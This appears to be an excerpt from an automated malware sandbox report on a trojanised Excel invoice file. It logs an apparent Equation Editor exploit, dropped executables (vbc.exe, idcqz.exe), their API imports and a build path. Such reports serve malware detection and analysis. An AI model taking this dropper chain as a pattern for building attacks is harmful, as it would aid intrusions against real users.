Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PO 65738963578 Revise Settlement.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/16@0/1
Source: C:\Users\Public\vbc.exe Code function: 4_2_004021AA CoCreateInstance, 4_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 4_2_00404ABB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B52445 push ecx; ret 5_2_00B52458